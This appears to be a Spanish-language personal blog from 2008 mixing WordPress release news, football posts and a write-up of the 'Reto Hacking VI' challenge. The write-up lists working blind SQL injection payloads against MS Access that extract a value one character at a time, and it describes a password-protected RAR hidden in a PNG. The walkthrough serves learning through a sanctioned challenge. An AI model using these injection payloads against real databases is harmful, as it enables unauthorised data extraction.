g30rg3 Blog

WordPress 2.5.1

g30rg3_x — Fri, 25 Apr 2008 16:49:14 +0000

WordPress 2.5.1 ya se encuentra disponible.

Esta actualización incluye actualizaciones de seguridad con respecto a varios problemas de XSS/XSRF en el modulo de “Medios electrónicos” así como problemas con la integridad de las cookies, descubiertos por Alexander Concha y Steven J. Murdoch respectivamente.
Se recomienda actualizar lo mas pronto posible.

Descargar WordPress 2.5.1
Descargar Solo Archivos Modificados desde la versión 2.5 (Diferencias)

Happy Birthday to me… 23

g30rg3_x — Wed, 23 Apr 2008 05:03:23 +0000

Superlider 3 - Sotanero 2: ¿Acaso esperaban otro resultado?

g30rg3_x — Tue, 15 Apr 2008 00:10:38 +0000

Es simple pollos, la lucha era 1º vs 18º, Superlider vs Sotanero, …
No había por donde darle siquiera 1 peso a favor del américa, aunque nos pasaron a dar un pequeño sustito con los dos goles rápidos de cabañas, estos mismos no les alcanzaron ni para al menos salvar algo del pésimo juego desplegado por estos mismos.
Realmente fue penoso ver a un américa desganado, débil, lento y lo peor que pueda pasar con falta de corazón, sin duda alguna cualquier chivista hubiera preferido enfrentarse a un mejor américa pero bueno esto es el clásico de clásicos así que victoria es victoria.

Así que siguiendo con la tradición…

Gracias Santana por demostrarle a los pollos quien manda:

Pollos esto es jugar por amor a la camiseta no por billetes:

Simplemente inferiores a nosotros:

Así es mamacita, míralos con desprecio:

Por que somos AMPLIAMENTE SUPERIORES a los pollos.

¡CHIVAS MANDA!

La mejor forma de guardar tu contraseña

g30rg3_x — Sun, 13 Apr 2008 02:24:21 +0000

Siempre que se lee cualquier libro, articulo, entrada o panfleto sobre seguridad informática, siempre se hablan sobre las contraseñas y la forma en que se deben guardar las mismas, increíble que con tantas advertencias aun existan administradores que siguen sin seguir ningún tipo de recomendación dada…

(La captura fue tomada usando una PC de la red interna de una PyME)

Luego apuntan que la intrusión fue hecha por un “juanker” habilidoso.

WordPress 2.5 “Michael Brecker”

g30rg3_x — Wed, 02 Apr 2008 07:47:46 +0000

Por fin después de una ardua labor, cientos de parches, bastantes ciclos de pruebas y uno que otro retraso, la ya famosa versión 2.5 de WordPress es ahora la rama “estable” de esta “Blogging CMS“.
WordPress 2.5 es obra de muchas pero muchas discusiones que se llevaron en las listas de correo (wp-hackers y wp-testers) tanto como con datos recabados directamente del bug tracker así como de WordPress Ideas… en fin son muchas pero muchas manos las que hicieron esta magnifica obra de arduo trabajo.

Esta versión trae como su estandarte de mejora, el cambio total (así como mejoras añadidas al mismo) del panel de administración de WordPress mejor conocido entre los usuarios simplemente como “Dashboard”, sin embargo para ser sincero este mismo no hes de mi total a grado (mas que nada por el esquema de colores, pero esto tiene una solución simple, la cual es entrar a nuestro perfil y cambiar al esquema de colores por el clásico/antiguo) pero sin duda alguna no puedo negar que es bastante agradable, funcional y practico este mismo.
Pero bueno como bien enuncia la entrada en el Blog de Desarrollo de WordPress, existen muchas mejoras; la mayoría de estas son relacionadas al manejo de galerías de imágenes y de otros tipos de medios electrónicos, en fin son muchas las mejoras que saltan a la vista tanto para los usuarios de esta misma asi como para los que desarrollan sobre esta plataforma de publicación, solo por enunciar algunas (que a mi juicio son las de mayor importancia):

Uso de la librería phpass para guardar las contraseñas en la base de datos.
Cookies seguras.
Documentación interna.
ShortCode API.

Pero sin duda alguna entre estas 4, la que se lleva todos mis aplausos (como desarrollador) es la documentación interna, ya que (para los que no estén familiarizados con el desarrollo bajo WordPress) era/es un dolor de cabeza ir al codex y tratar de buscar información sobre ciertos filtros, funciones, … realmente me puedo sentar a enunciar los muchos pero muchos problemas que tuve tratando de buscar información 100% fiable sobre ciertas funciones internas de WordPress, en la mayoría de los casos o mejor dicho en el 97% de estos mismos, terminaba mirando como loco dentro de todo el código para entender lo que hacia una simple función o bien para buscar algún filtro y aprender a usar este mismo.
La documentación interna, ayuda a que no me tenga que pelear ni enmarañar con tanto código ya que trae lo breve y conciso de la función o bien de la clase interna.
Aunque la verdad me sorprende ver la poca importancia que se le ha dado a la misma, así como la poca importancia que le han dado al arduo trabajo realizado por Jacob Santos aka darkdragon, ya que este mismo se encargo de realizar la gran mayoría de este pesado trabajo; gracias a las incansables horas de este usuario/desarrollador se ha logrado gran parte de este documentación interna, así que la verdad me pongo de pie y aplaudo a este gran usuario/desarrollador por haber realizado semejante labor.
Desde este pequeño blog mis mas sinceros saludos para Jacob Santos.

En fin WordPress 2.5 hasta el momento parece ser una de las versiones mas solidas desde la versión 2.0 y la verdad no es para menos, esta versión contiene el trabajo de ya 5 subversiones, contiene muchísimas mejoras en diferentes aspectos de la plataforma, los cuales si realmente llegáramos a comparar con la antigua rama 2.0, nos abrumaría lo que ya WordPress puede hacer por si solo (sin necesidad de llenarlo de plugins).

Un regalo geek muy especial

g30rg3_x — Thu, 28 Feb 2008 00:52:43 +0000

Hace unos días me llego de sorpresa un paquete a mi casa, que contenía una taza muy elegante (y grande) con el logotipo de WordPress…

La taza es muy elegante y de hecho ha llamado la atención de todas las personas que han visitado mi casa (algunos se la han intentado hasta robar ), no se realmente quien fue la persona que me la envió sospecho que fue alguno de mis donadores, pero bueno sea quien sea le quiero dar las gracias por el regalo, aunque no soy un wp-fan a morir, la taza se ve bien geek y muy elegante al mismo tiempo y que mas puedo decir… me encanto el detalle y anima a seguir desarrollando mis proyectos actuales e ideas en proceso sobre esta Blogging-CMS tan popular…

Sin mas que añadir nuevamente muchas gracias a la persona que me lo alla regalado…

Pon A Prueba Tus Conocimientos Sobre XSS

g30rg3_x — Tue, 26 Feb 2008 07:18:16 +0000

¿Deseas poner a prueba lo que sabes sobre XSS?
Que esperas Inscribete a los “XSS Challenges” por yamagata21!!!

Hace unos momentos acabo de terminar estos retos, en general me parecen geniales tienes de todo y un poco mas, si sabes sobre XSS la verdad no se que esperas… por que de verdad estos retos te pondrán aprueba, si no tienes ideas sobre XSS también te lo recomendaría aunque te va a costar mas trabajo sobre todo cuando los retos empiezan a tener escenarios muy específicos.
Lo único que no me gusto del torneo (a manera general) es que se base del lado del cliente el análisis de la respuesta a los retos, esto provoca que con un mínimo de esfuerzo puedas pasar el torneo completo sin siquiera tener conocimientos sobre el mismo, así que de seguro abra mas de 1 tramposo por ahí.

Así que te si te sobran un par de horas libres… Inscribete

Solución al Reto Hacking VI (Retos Chema)

g30rg3_x — Fri, 22 Feb 2008 08:05:57 +0000

Introducción / Advertencia
Antes de seguir con mi propia versión acerca de como resolví el reto hacking 6 del buen chema, tengo que aclarar que mi “solucionario” es mas bien sobre lo que hice y como fui desarrollando las ideas que me llevaron a acabarlo, por consecuente no creo estar al mismo nivel competitivo de las otras mentes maestras que participan reto a reto en la web de chema (como lo son Daniel Kachakil, Mandingo, Romansoft, etc…) así que les recomendaría leer primero los solucionarios de estos mismos antes que el mio, asi que recalcando: sobre advertencia no hay engaño .

Primera Parte
La primera parte de todo el reto sin duda fue la pieza clave del mismo, aunque chema nos había dejado algunas pistas, estas tenían forma de ser meramente todos unos acertijos así que no le di importancia a las mismas y tire las mismas.
Una vez terminado de registrar vemos tres partes importantes del reto había una sección de practica, una de examen y otra de subir nota, como buen recién registrado lo primero que hice fue entrar directo al examen y empezar a probar las inyecciones comunes, claro al tercer intento el reto me pateo y me forzó a entrar de nuevo después de como 18 intentos vagos decidí irme a subir nota donde me decía que tengo que primero aprobar el examen así que solo me quedaba la practica.
La practica nos hacia una pregunta simple: ¿Cuanto es 1000 + 1?, al probar la respuesta obvia de 1001 solo nos decía: “vamos, vamos, garrunpintizate!”, probé poniendo 10001 (como si fueran dos cadenas concatenándose) y nada aun…
Como se imaginaran probé muchísimas cosas, inyecciones comunes que me sabia o bien se me venían a la mente y nada de nada, estaba mas perdido que un ciego en un desierto, ya estaba a punto de tirar la toalla… cuando se me acordó que para el reto 5 le había pedido un soplo a Romansoft (reto que nunca pude acabar debido a que la parte 2 me iba a llevar mas tiempo del que disponía) el cual amablemente me respondió así que atentando nuevamente con la buena fe de Romansoft le envié un correo para pedirle que me de un nuevo soplo que me ponga en la jugada (y lo hizo ), sin embargo después de enviarle el correo a Romansoft se me ocurrió una “idea feliz”, una teoría un poco loca que si bien no ayudo de manera directa a resolver el reto si me ayudo de manera indirecta.
Mi loca teoría enunciaba en la posibilidad de que exista alguna forma de que a través de ataques de desbordamiento de enteros podíamos de alguna forma inyectar o hacerle algo a la aplicación web, se que sonaba medio tonto pero siendo un reto del chema bueno pues todo lo que venga a la mente puede ser posible. Esto obviamente me llevo a probar los limites de enteros en sistemas de 32-bits, como primera prueba use el limite por el lado positivo (2147483647) de los enteros y este mismo me dio un mensaje alentador: “Uy que cerca, casi estás garrupintizado!”, pfff quede como loco me sentí reanimado otra vez primera vez que me respondía con otra cosa que no fuera lo mismo o el mensaje de error sobre conversión de enteros.
En ese momento me dije a mi mismo: ¿Sera que mi teoría loca no es tan loca?, sin embargo para antes que pudiera proseguir con la misma en ese momento me llego el correo de respuesta de Romansoft donde en palabras cortas me decía dos palabras importantes… “Blind SQL Injection” y “MS Access”. Debido a los pocos conocimientos que tenia sobre MS Access esto me forzó a buscar sobre que funciones podría usar para aprovechar durante mis inyecciones, claro con un par de “googlazos” me llevo rápidamente a la web MS Access SQL Injection Cheat Sheet, un documento lleno de trucos para aprovechar bien tanto las inyecciones a ciegas como las normales en Base De Datos gestionadas a través de MS Access, este documento yo lo tome como pieza clave para formar mis inyecciones.
Pero bueno ya tenia todo así que llego el momento de evaluar sabia que la cosa iba a ser una inyección a ciegas así que mi primer trabajo fue buscar que sentencias eran las verdaderas y cuales las falsas, lo cual claro debido a mi descubrimiento anterior sobre el limite de enteros (2147483647) y a que el ejemplo de la practica (1000 + 1) me dio una idea podia entonces decir que las siguientes respuesta significaban…
Verdadero = Uy que cerca, casi estás garrupintizado!
Falso = Vamos, vamos, garrupintizate!
Error = ACCESS: Error al convertir valor numérico
Así que bueno llego la parte verdadera: las inyecciones, como decía en la hoja de trucos tenia que ir descubriendo primero el nombre de la tabla, luego el nombre del valor, luego el numero de filas devueltas y finalmente si quiero el largo de alguna de las filas devueltas.

Primero empece con el nombre de la tabla para la tabla probé muchas ideas desde rh6, chema, examen… hasta que obviamente llegue a garrupito:
2147483646 + IIF((SELECT TOP 1 1 FROM garrupito), 1, 0)
(Como pueden notar la idea era básica si ejecutaba la query devolvía 1 sacando el mensaje de verdadero de otra forma me salia error al no existir la tabla.)

Luego seguí con el nombre del atributo, este me salio rápido lo primero que probé era valor:
2147483646 + IIF((SELECT TOP 1 Valor FROM garrupito), 1, 0)

Siguiendo tenemos que solo hay 1 fila:
2147483646 + IIF((SELECT COUNT(*) FROM garrupito) = 1, 1, 0)

Y Finalmente el largo del contenido de esta fila:
2147483646 + IIF((SELECT TOP 1 LEN(Valor) FROM garrupito) = 36, 1, 0)

Así que rehaciendo cuentas tenemos lo siguiente:
La Tabla se llama garrupito, el único Atributo se llama Valor, solo hay 1 fila y el valor de esta fila tiene un largo de 36.

Ya teniendo todo esto la siguiente parte era dedicarme a crear una inyección donde pueda ir probando carácter por carácter que valor correspondía para así obtener el contenido de la fila a través de la inyección, la hoja de trucos para MS Access nos sugería una pero desgraciadamente el gestor MS Access de BDs no es sensible a las mayúsculas haciendo que A y a sean iguales, sin embargo esto no me impidió elaborar una solución/query:
2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, X, 1)) FROM garrupito) = Y, 1, 0)
Como puede notarse en la inyección
X = El Numero del carácter que se esta probando, los cuales para el reto de chema iban desde el 1 hasta el 36
Y = Es el valor en ascii a probar los cuales.
Viendo obviamente todo el trabajo que iba a necesitar se me dio por diseñar una aplicación que lo haga por mi, sin embargo esta misma no la pude acabar primero por que todos mis intentos fueron fallidos y segundo por que mientras hacia esta aplicacion, dos usuarios me rebasaron y acabaron el reto, así que por temor a que otros usuarios me rebasen preferí hacerlo a mano así que a continuación les dejo todas las inyecciones SQL que me resultaron positivas para sacar el valor de la fila:

9 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 1, 1)) FROM garrupito) = 57, 1, 0)
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 2, 1)) FROM garrupito) = 68, 1, 0)
B = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 3, 1)) FROM garrupito) = 66, 1, 0)
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 4, 1)) FROM garrupito) = 55, 1, 0)
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 5, 1)) FROM garrupito) = 68, 1, 0)
1 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 6, 1)) FROM garrupito) = 49, 1, 0)
5 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 7, 1)) FROM garrupito) = 53, 1, 0)
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 8, 1)) FROM garrupito) = 55, 1, 0)
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 9, 1)) FROM garrupito) = 45, 1, 0)
C = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 10, 1)) FROM garrupito) = 67, 1, 0)
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 11, 1)) FROM garrupito) = 68, 1, 0)
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 12, 1)) FROM garrupito) = 54, 1, 0)
8 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 13, 1)) FROM garrupito) = 56, 1, 0)
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 14, 1)) FROM garrupito) = 45, 1, 0)
4 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 15, 1)) FROM garrupito) = 52, 1, 0)
2 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 16, 1)) FROM garrupito) = 50, 1, 0)
a = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 17, 1)) FROM garrupito) = 97, 1, 0)
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 18, 1)) FROM garrupito) = 51, 1, 0)
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 19, 1)) FROM garrupito) = 45, 1, 0)
A = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 20, 1)) FROM garrupito) = 65, 1, 0)
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 21, 1)) FROM garrupito) = 51, 1, 0)
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 22, 1)) FROM garrupito) = 54, 1, 0)
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 23, 1)) FROM garrupito) = 54, 1, 0)
- = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 24, 1)) FROM garrupito) = 45, 1, 0)
C = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 25, 1)) FROM garrupito) = 67, 1, 0)
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 26, 1)) FROM garrupito) = 51, 1, 0)
2 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 27, 1)) FROM garrupito) = 50, 1, 0)
B = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 28, 1)) FROM garrupito) = 66, 1, 0)
E = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 29, 1)) FROM garrupito) = 69, 1, 0)
3 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 30, 1)) FROM garrupito) = 51, 1, 0)
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 31, 1)) FROM garrupito) = 55, 1, 0)
7 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 32, 1)) FROM garrupito) = 55, 1, 0)
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 33, 1)) FROM garrupito) = 68, 1, 0)
F = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 34, 1)) FROM garrupito) = 70, 1, 0)
6 = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 35, 1)) FROM garrupito) = 54, 1, 0)
D = 2147483646 + IIF((SELECT TOP 1 ASC(MID(Valor, 36, 1)) FROM garrupito) = 68, 1, 0)

Ya juntos todos estos caracteres formaban: 9DB7D157-CD68-42a3-A366-C32BE377DF6D, cadena que correspondía a la respuesta del examen; sin embargo ami me paso algo curioso al ingresar esta respuesta el sistema me pateo (tal vez por que era la convocatoria de septiembre) así que se me ocurrió que era un hash o algo raro y empece a hacer nuevamente teorías locas sobre hashes y pues fue de pura suerte que halla realmente vuelto a intentar poner la respuesta y ahora si me acepte y pase a la siguiente y ultima parte.

Segunda Parte
Aunque por naturaleza tendamos a creer que estamos en algo mas difícil que lo anterior esta vez así no lo fue, cuando abres ya la siguiente parte de “Subir Nota” nos topamos con un texto que dice que tenemos tarea para casa, que contiene una liga hacia una imagen con un ejercicio de ajedrez, después de darle una mirada rápida te das cuenta que es imposible hacer mate 1 así que la cosa no iba por ahí.
Al tener un PNG algo pesadito lo primero que se me ocurrió es: esteganografía, así que pensé: sera que el chema se hecho su propio algoritmo de esteganografía en PNG? googleando un poco nos salen algunas referencias sobre como hacer esto sin embargo después de probar estas ninguna me marco que tenia texto escondido dentro de la imagen así que nuevamente estuve a punto de tirar la toalla y esperar a los solucionarios… sin embargo esta vez de la nada se me ocurrió una idea espontanea algo loca, tal vez sacando una copia de la misma imagen al re codificarse este salgan los bytes que posiblemente estén modificados y así podría con estos juguetear y tal vez me salga un texto a medias o completo pero con ruido.
Al realizar esto y hacer una comparación buscando las diferencias se veía claramente (mas bien horriblemente) el sobrante… increíblemente al final del PNG esta pegado un archivo RAR, pues el siguiente paso era simple, tomar ese archivo y crearlo.
Como han de suponer chema para no hacérnosla tan fácil le puso clave al RAR, como todos lo primero que hice fue empezar a sacar mis utilidades para hacer fuerza bruta al fichero RAR pero antes de empezar decidí probar con palabras conocidas como rh6, chema, examen, tarea, notaextra, ajedrez, chess, … así hasta llegar a garrupito, el cual era la contraseña del RAR.
Una vez abierto este mismo lo que quedaba era simplemente otra imagen que contenía el texto:
“It’s imposible, It’s only possible in two steps”
Que era la respuesta para subir de nota así que como podrán ver era la conjetura inicial que hicimos a la parte 2 del reto solo que en ingles.

Concluyendo…
Como notaran la parte 2 es un chiste comparada con el trabajo y esfuerzo realizado en la parte 1, la verdad es que me encanto esta vez tener un poco de tiempo para participar en estos retos, ya que de estos tipos de retos son de los que aprendes mas, espero estar a la altura del siguiente y ahora si esta vez no preguntarle a román .

Enlaces
Reto Hacking VI (Chema)
Un informático en el lado del mal
MS Access SQL Injection Cheat Sheet

Zorras 0 - Chivas 2 (Clausura 2008)

g30rg3_x — Tue, 12 Feb 2008 03:16:30 +0000

Que mas se puede decir, ya son 4 señores, ya son 4… ya hasta pena me da decirles algo…

Vulnerabilidad de Seguridad en WordPress 2.3.2

g30rg3_x — Sun, 03 Feb 2008 05:55:55 +0000

Bueno aunque llego muy cansado de una extra jornada laboral ayudando a mi familia (en el por supuesto negocio familiar) y a pesar que el tiempo que tengo para estar online lo iba realmente a destinar para darle reto hacking 6 del buen chema (el cual me inscribí y le di su miradita rápida ayer por la noche) pues lo decidí gastar en esta entrada.

Realmente me es extraño ver que nadie ha estado escribiendo sus notas alarmistas normales sobre el bug/vulnerabilidad, sobre todo cierto blog dedicado a la seguridad en blogs (me reservo el derecho de nombrarlo), pero en fin para no hacerla larga (como dije ando cansado) se ha descubierto un nuevo bug bajo el script que maneja el protocolo XML-RPC en WordPress, el cual permite que usuarios con pocos privilegios (suscriptores) cambiar el contenido de las entradas publicadas, aunque según los que la han podido probar, aunque si se logran editar las entradas estas quedan como borradores.
Como de seguro ya notaron se requiere que el blog permita el registro de usuarios para obtener una cuenta de suscriptor y así explotar la vulnerabilidad algo que muy pocos blogs practican (el único blog cercano que conozco que tiene permitido esto es el del michoacano -juaxors es su oportunidad, denle con todo a la michoaketa/julio -) así que tampoco es una alarma grande pero si digamos es de los primeros bugs de seguridad que veo en la rama 2.3.x que tienen un poco de seriedad.

Las soluciones ya han sido dadas así que para los que las buscan aquí les dejo las ligas:
Archivo de Diferencias (diff)
Archivo Pre-Parcheado

Pueden encontrar mas información sobre la vulnerabilidad en:
http://trac.wordpress.org/ticket/5313
http://www.theseekerblog.com/?p=284
http://www.village-idiot.org/archives/2008/02/02/wordpress-232-exploit-confirmed/